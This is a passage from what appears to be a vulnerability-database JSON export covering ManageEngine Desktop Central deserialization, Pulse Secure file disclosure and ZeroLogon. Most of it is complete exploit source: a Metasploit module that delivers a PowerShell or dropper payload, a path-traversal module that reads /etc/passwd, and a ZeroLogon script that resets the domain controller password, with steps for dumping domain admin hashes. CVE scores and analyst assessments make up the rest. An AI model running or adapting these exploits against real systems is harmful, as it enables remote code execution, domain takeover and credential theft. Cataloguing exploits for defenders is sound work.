r.status_code == 200:\n return True\n return False\n\ndef main():\n if len(sys.argv) != 3:\n print(\"(+) usage: %s\" % sys.argv[0])\n print(\"(+) eg: %s 172.16.175.153 mspaint.exe\" % sys.argv[0])\n sys.exit(1)\n t = sys.argv[1]\n c = sys.argv[2]\n if we_can_plant_serialized(t, c):\n print(\"(+) planted our serialized payload\")\n if we_can_execute_cmd(t):\n print(\"(+) executed: %s\" % c)\n\nif __name__ == \"__main__\":\n main()", "sourceHref": "https://srcincite.io/pocs/src-2020-0011.py.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2023-06-05T18:30:05", "description": "This Metasploit module exploits a Java deserialization vulnerability in the getChartImage() method from the FileStorage class within ManageEngine Desktop Central versions below 10.0.474. Tested against 10.0.465 x64.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-15T00:00:00", "type": "zdt", "title": "ManageEngine Desktop Central Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2020-03-15T00:00:00", "id": "1337DAY-ID-34095", "href": "https://0day.today/exploit/description/34095", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::CmdStager\n include Msf::Exploit::Powershell\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Java Deserialization',\n 'Description' => %q{\n This module exploits a Java deserialization vulnerability in the\n getChartImage() method from the FileStorage class within ManageEngine\n Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.\n\n \"The short-term fix for the arbitrary file upload vulnerability was\n released in build 10.0.474 on January 20, 2020. In continuation of that,\n the complete fix for the remote code execution vulnerability is now\n available in build 10.0.479.\"\n },\n 'Author' => [\n 'mr_me', # Discovery and exploit\n 'wvu' # Module\n ],\n 'References' => [\n ['CVE', '2020-10189'],\n ['URL', 'https://srcincite.io/advisories/src-2020-0011/'],\n ['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],\n ['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],\n ['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']\n ],\n 'DisclosureDate' => '2020-03-05', # 0day release\n 'License' => MSF_LICENSE,\n 'Platform' => 'windows',\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n ['Windows Command',\n 'Arch' => ARCH_CMD,\n 'Type' => :win_cmd\n ],\n ['Windows Dropper',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :win_dropper\n ],\n ['PowerShell Stager',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :psh_stager\n ]\n ],\n 'DefaultTarget' => 2,\n 'DefaultOptions' => {\n 'RPORT' => 8383,\n 'SSL' => true,\n 'WfsDelay' => 60 # It can take a little while to trigger\n },\n 'CmdStagerFlavor' => 'certutil', # This works without issue\n 'Notes' => {\n 'PatchedVersion' => Gem::Version.new('100474'),\n 'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?\n 'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n ))\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'configurations.do')\n )\n\n unless res\n return CheckCode::Unknown('Target is not responding to check')\n end\n\n unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')\n return CheckCode::Unknown('Target is not running Desktop Central')\n end\n\n version = res.get_html_document.at('//input[@id = \"buildNum\"]/@value')&.text\n\n unless version\n return CheckCode::Detected('Could not detect Desktop Central version')\n end\n\n vprint_status(\"Detected Desktop Central version #{version}\")\n\n if Gem::Version.new(version) < notes['PatchedVersion']\n return CheckCode::Appears(\"#{version} is an exploitable version\")\n end\n\n CheckCode::Safe(\"#{version} is not an exploitable version\")\n end\n\n def exploit\n # NOTE: Automatic check is implemented by the AutoCheck mixin\n super\n\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n\n case target['Type']\n when :win_cmd\n execute_command(payload.encoded)\n when :win_dropper\n execute_cmdstager\n when :psh_stager\n execute_command(cmd_psh_payload(\n payload.encoded,\n payload.arch.first,\n remove_comspec: true\n ))\n end\n end\n\n def execute_command(cmd, _opts = {})\n # XXX: An executable is required to run arbitrary commands\n cmd.prepend('cmd.exe /c ') if target['Type'] == :win_dropper\n\n vprint_status(\"Serializing command: #{cmd}\")\n\n # I identified mr_me's binary blob as the CommonsBeanutils1 payload :)\n serialized_payload = Msf::Util::JavaDeserialization.ysoserial_payload(\n 'CommonsBeanutils1',\n cmd\n )\n\n # XXX: Patch in expected serialVersionUID\n serialized_payload[140, 8] = \"\\xcf\\x8e\\x01\\x82\\xfe\\x4e\\xf1\\x7e\"\n\n # Rock 'n' roll!\n upload_serialized_payload(serialized_payload)\n deserialize_payload\n end\n\n def upload_serialized_payload(serialized_payload)\n print_status('Uploading serialized payload')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path,\n '/mdm/client/v1/mdmLogUploader'),\n 'ctype' => 'application/octet-stream',\n 'vars_get' => {\n 'udid' => 'si\\\\..\\\\..\\\\..\\\\webapps\\\\DesktopCentral\\\\_chart',\n 'filename' => 'logger.zip'\n },\n 'data' => serialized_payload\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')\n end\n\n print_good('Successfully uploaded serialized payload')\n\n # C:\\Program Files\\DesktopCentral_Server\\bin\n register_file_for_cleanup('..\\\\webapps\\\\DesktopCentral\\\\_chart\\\\logger.zip')\n end\n\n def deserialize_payload\n print_status('Deserializing payload')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'cewolf/'),\n 'vars_get' => {'img' => '\\\\logger.zip'}\n )\n\n unless res && res.code == 200\n fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')\n end\n\n print_good('Successfully deserialized payload')\n end\n\nend\n", "sourceHref": "https://0day.today/exploit/34095", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-04T20:01:09", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2019-08-21T00:00:00", "type": "zdt", "title": "Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Arbitrary File Disclosure Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "1337DAY-ID-33140", "href": "https://0day.today/exploit/description/33140", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\r\n# Google Dork: inurl:/dana-na/ filetype:cgi\r\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\r\n# Vendor Homepage: https://pulsesecure.net\r\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n# Tested on: Linux\r\n# CVE : CVE-2019-11510 \r\nrequire 'msf/core'\r\nclass MetasploitModule < Msf::Auxiliary\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Post::File\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Pulse Secure - System file leak',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\r\n This exploit reads /etc/passwd as a proof of concept\r\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\r\n\t\t\t},\r\n\t\t\t'References' =>\r\n\t\t\t [\r\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\r\n\t\t\t ],\r\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t 'DefaultOptions' =>\r\n\t\t {\r\n\t\t 'RPORT' => 443,\r\n\t\t 'SSL' => true\r\n\t\t },\r\n\t\t\t))\r\n\r\n\tend\r\n\r\n\r\n\tdef run()\r\n\t\tprint_good(\"Checking target...\")\r\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\r\n\r\n\t\tif res && res.code == 200\r\n\t\t\tprint_good(\"Target is Vulnerable!\")\r\n\t\t\tdata = res.body\r\n\t\t\tcurrent_host = datastore['RHOST']\r\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\r\n\t\t\tFile.delete(filename) if File.exist?(filename)\r\n\t\t\tfile_local_write(filename, data)\r\n\t\t\tprint_good(\"Parsing file.......\")\r\n\t\t\tparse()\r\n\t\telse\r\n\t\t\tif(res && res.code == 404)\r\n\t\t\t\tprint_error(\"Target not Vulnerable\")\r\n\t\t\telse\r\n\t\t\t\tprint_error(\"Ooof, try again...\")\r\n\t\t\tend\r\n\t\tend\r\n\tend\r\n\tdef parse()\r\n\t\tcurrent_host = datastore['RHOST']\r\n\r\n\t fileObj = File.new(\"msf_sslwebsession_\"+current_host+\".bin\", \"r\")\r\n\t words = 0\r\n\t while (line = fileObj.gets)\r\n\t \tprintable_data = line.gsub(/[^[:print:]]/, '.')\r\n\t \tarray_data = printable_data.scan(/.{1,60}/m)\r\n\t \tfor ar in array_data\r\n\t \t\tif ar != \"............................................................\"\r\n\t \t\t\tprint_good(ar)\r\n\t \t\tend\r\n\t \tend\r\n\t \t#print_good(printable_data)\r\n\r\n\t\tend\r\n\t\tfileObj.close\r\n\tend\r\nend\n\n# 0day.today [2019-12-04] #", "sourceHref": "https://0day.today/exploit/33140", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T16:39:55", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-11-18T00:00:00", "type": "zdt", "title": "ZeroLogon - Netlogon Elevation of Privilege Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-11-18T00:00:00", "id": "1337DAY-ID-35274", "href": "https://0day.today/exploit/description/35274", "sourceData": "# Exploit Title: ZeroLogon - Netlogon Elevation of Privilege\n# Date: 2020-10-04\n# Exploit Author: West Shepherd\n# Vendor Homepage: https://www.microsoft.com\n# Version: Microsoft Windows Server 2019, Windows Server 2016, Windows Server 2012 R2, Windows Server 2012, Windows Server 2008 R2\n# Tested on: Microsoft Windows Server 2016 Standard x64\n# CVE : CVE-2020-1472\n# Credit to: Tom Tervoort for discovery and Dirk-Janm for Impacket code\n# Sources: https://www.secura.com/pathtoimg.php?id=2055\n# Requirements: python3 and impacket 0.9.21+ (tested using this version)\n#!/usr/bin/env python3\nimport hmac, hashlib, struct, sys, socket, time, argparse, logging, codecs\nfrom binascii import hexlify, unhexlify\nfrom subprocess import check_call\nfrom impacket.dcerpc.v5.dtypes import NULL, MAXIMUM_ALLOWED\nfrom impacket.dcerpc.v5 import nrpc, epm, transport\nfrom impacket import crypto, version\nfrom impacket.examples import logger\nfrom Cryptodome.Cipher import AES\nfrom struct import pack, unpack\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\n\n\nclass Exploit:\n def __init__(\n self,\n name='',\n address='',\n attempts=2000,\n password=''\n ):\n name = name.rstrip('$')\n self.secureChannelType = nrpc.NETLOGON_SECURE_CHANNEL_TYPE\\\n .ServerSecureChannel\n self.authenticator = self.getAuthenticator(stamp=0)\n self.clearNewPasswordBlob = b'\\x00' * 516\n self.primaryName = ('\\\\\\\\%s' % name) + '\\x00'\n self.accountName = ('%s$' % name) + '\\x00'\n self.computerName = name + '\\x00'\n self.clientCredential = b'\\x00' * 8\n self.clientChallenge = b'\\x00' * 8\n self.negotiateFlags = 0x212fffff\n self.address = address\n self.max = attempts\n self.dce = None\n self.sessionKey = None\n self.clientStoredCredential = None\n self.password = password\n\n def encodePassword(self, password):\n if isinstance(password, str):\n password = password.encode('utf-8')\n return b'\\x00' * (512 - len(password))\\\n + password \\\n + pack('<L', len(password))\n\n def getAuthenticator(self, creds=b'\\x00' * 8, stamp=10):\n authenticator = nrpc.NETLOGON_AUTHENTICATOR()\n authenticator['Credential'] = creds\n authenticator['Timestamp'] = stamp\n return authenticator\n\n def serverReqChallenge(self):\n try:\n binding = epm.hept_map(\n self.address, nrpc.MSRPC_UUID_NRPC, protocol='ncacn_ip_tcp'\n )\n self.dce = transport.DCERPCTransportFactory(binding).get_dce_rpc()\n self.dce.connect()\n self.dce.bind(nrpc.MSRPC_UUID_NRPC)\n return nrpc.hNetrServerReqChallenge(\n self.dce,\n self.primaryName,\n self.computerName,\n self.clientChallenge\n )\n except BaseException as ex:\n self.logError(ex)\n\n def serverAuthenticate(self):\n try:\n auth = nrpc.hNetrServerAuthenticate3(\n self.dce,\n self.primaryName,\n self.accountName,\n self.secureChannelType,\n self.computerName,\n self.clientCredential,\n self.negotiateFlags\n )\n assert auth['ErrorCode'] == 0\n self.logInfo('successfully authenticated')\n return True\n except nrpc.DCERPCSessionError as ex:\n self.dce = None\n if ex.get_error_code() == 0xc0000022:\n return None\n else:\n self.logFail(ex.get_error_code())\n except BaseException as ex:\n self.dce = None\n self.logFail(ex)\n self.dce = None\n\n def serverPasswordSet(self):\n try:\n return nrpc.hNetrServerPasswordSet2(\n self.dce,\n self.primaryName,\n self.accountName,\n self.secureChannelType,\n self.computerName,\n self.authenticator,\n self.clearNewPasswordBlob\n )\n except BaseException as ex:\n self.logError(ex)\n\n def authenticate(self):\n self.logInfo(\n 'checking target, attempting to authenticate %d max\nattempts' % self.max\n )\n for attempt in range(0, self.max):\n self.logInfo('attempt %d' % attempt)\n self.serverReqChallenge()\n self.serverAuthenticate()\n if self.dce is not None:\n break\n if self.dce:\n return True\n else:\n self.logError('failed to authenticate')\n\n def exploit(self):\n self.logInfo('attempting password reset')\n reset = self.serverPasswordSet()\n if reset['ErrorCode'] == 0:\n self.logInfo('successfully reset password')\n else:\n self.logError('failed to reset password')\n return self\n\n def ComputeNetlogonCredentialAES(self, challenge):\n return nrpc.ComputeNetlogonCredentialAES(\n challenge,\n self.sessionKey\n )\n\n def logInfo(self, message):\n sys.stdout.write(\"[+] %s\\n\" % str(message))\n return self\n\n def logError(self, message):\n sys.stderr.write(\"[-] error %s\\n\" % str(message))\n\n def logFail(self, message):\n sys.stderr.write(\"[!] failure %s\\n\" % str(message))\n sys.exit(2)\n\n def restore(self):\n self.logInfo('attempting to restore password')\n self.clientChallenge = b'12345678'\n try:\n self.primaryName = NULL\n challenge = self.serverReqChallenge()\n self.sessionKey = nrpc.ComputeSessionKeyAES(\n '', self.clientChallenge, challenge['ServerChallenge']\n )\n self.clientCredential = self.ComputeNetlogonCredentialAES(\n self.clientChallenge\n )\n try:\n self.serverAuthenticate()\n except Exception as e:\n if str(e).find('STATUS_DOWNGRADE_DETECTED') < 0:\n raise\n self.logInfo('restoring password')\n self.clientStoredCredential = pack('<Q', unpack('<Q',\nself.clientCredential)[0] + 10)\n self.authenticator = self.getAuthenticator(\n\ncreds=self.ComputeNetlogonCredentialAES(self.clientStoredCredential)\n )\n self.clearNewPasswordBlob = self.ComputeNetlogonCredentialAES(\n self.encodePassword(self.password)\n )\n reset = self.serverPasswordSet()\n if reset['ErrorCode'] == 0:\n self.logInfo('successfully restored password')\n else:\n self.logError('failed to restore password')\n except Exception as ex:\n self.logError(ex)\n return self\n\n\nif __name__ == '__main__':\n info = \"\"\"\nNOTE - Exploitation will break the DC until restored, recommended guidelines:\n\n 1. Check the DC - usually ~300 attempts, use the NETBIOS name not the FQDN:\n cve-2020-1472.py -do check -target <NETBIOS NAME> -ip <IP>\n\n 2. Exploit the DC - this will break the DC until restored:\n cve-2020-1472.py -do exploit <NETBIOS NAME> -ip <IP>\n\n 3. Dump the DC - for the DA hashes, this will not contain the\nmachine hex-pass:\n secretsdump.py -just-dc -no-pass <NETBIOS NAME>\\$@<IP>\n\n 4. Dump the DC again - use the DA hash to get the machines hex-pass:\n secretsdump.py -no-pass -hashes <LMHASH>:<NTHASH> <DOMAIN>/<ADMIN>@<IP>\n\n 5. Restore target - this fixes the DC:\n cve-2020-1472.py -do restore -target <NETBIOS NAME> -ip <IP>\n-hex <HEXPASS>\n\"\"\"\n parser = argparse.ArgumentParser(\n description='CVE-2020-1472 ZeroLogon Exploit - Netlogon\nElevation of Privilege',\n add_help=True\n )\n try:\n parser.add_argument('-do', default='check', action='store',\n help='What to do (default check):\n[check|restore|exploit]')\n parser.add_argument('-target', action='store',\n help='NETBIOS name of target DC (not the FQDN)')\n parser.add_argument('-ip', action='store',\n help='IP address of target DC')\n parser.add_argument('-password', default='', action='store',\n help='The plaintext password to use to\nreset the DC')\n parser.add_argument('-hex', default='', action='store',\n help='The hex password to use to restore\nthe DC (recommended)')\n parser.add_argument('-max', default=2000, action='store',\n help='Max attempts to authenticate with\nthe DC (usually ~300 or less)')\n\n if len(sys.argv) < 3:\n parser.print_help()\n print(info)\n sys.exit(1)\n options = parser.parse_args()\n\n if options.do.lower() == 'check':\n Exploit(\n name=options.target,\n address=options.ip,\n attempts=int(options.max)\n ).authenticate()\n elif options.do.lower() == 'exploit':\n exp = Exploit(\n name=options.target,\n address=options.ip,\n attempts=int(options.max)\n )\n if exp.authenticate():\n exp.exploit()\n elif options.do.lower() == 'restore':\n if options.hex != '' and options.password == '':\n options.password = unhexlify(options.hex)\n if options.password != '':\n exp = Exploit(\n name=options.target,\n address=options.ip,\n password=options.password\n ).restore()\n else:\n parser.print_help()\n\n except Exception as error:\n sys.stderr.write('[-] error in main %s\\n' % str(error))\n", "sourceHref": "https://0day.today/exploit/35274", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-06-05T14:45:36", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.\n\n \n**Recent assessments:** \n \n**J3rryBl4nks** at March 13, 2020 9:41pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\n**wvu-r7** at March 10, 2020 6:38pm UTC reported:\n\nDue to this being an unauthenticated serialization exploit, the bar for exploitation is very low. Serialization is rampant in software, and most companies aren\u2019t doing it correctly.\n\nIt\u2019s realtively easy these days to exploit serialization vulnerabilities with ysoserial/yososerial.net and it will be a problem for years going forward.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T00:00:00", "type": "attackerkb", "title": "CVE-2020-10189", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2021-07-27T00:00:00", "id": "AKB:86915DE7-C5F7-483B-A324-DF5B1929FBF6", "href": "https://attackerkb.com/topics/PyNCrvKjzq/cve-2020-10189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-10T15:01:32", "description": "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .\n\n \n**Recent assessments:** \n \n**dmelcher5151** at April 15, 2020 4:11pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. If not patched, likely wrecked.\n\n**hrbrmstr** at May 12, 2020 7:55pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. If not patched, likely wrecked.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-08T00:00:00", "type": "attackerkb", "title": "CVE-2019-11510", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-07-27T00:00:00", "id": "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "href": "https://attackerkb.com/topics/lx3Afd7fbJ/cve-2019-11510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:05:49", "description": "An elevation of privilege vulnerability exists when an attacker establishes a vulnerable Netlogon secure channel connection to a domain controller, using the Netlogon Remote Protocol (MS-NRPC), aka \u2018Netlogon Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-08-17T00:00:00", "type": "attackerkb", "title": "CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-16T00:00:00", "id": "AKB:71F77351-1AE5-4161-8836-D26680828466", "href": "https://attackerkb.com/topics/KzT7uN3Bx8/cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-06-05T14:24:40", "description": "Zoho ManageEngine Desktop Central before 10.0.474 allows remote code execution because of deserialization of untrusted data in getChartImage in the FileStorage class. This is related to the CewolfServlet and MDMLogUploaderServlet servlets.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-03-06T17:15:00", "type": "cve", "title": "CVE-2020-10189", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10189"], "modified": "2022-10-07T13:42:00", "cpe": [], "id": "CVE-2020-10189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-10189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2023-06-10T14:53:08", "description": "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-08T17:29:00", "type": "cve", "title": "CVE-2019-11510", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": 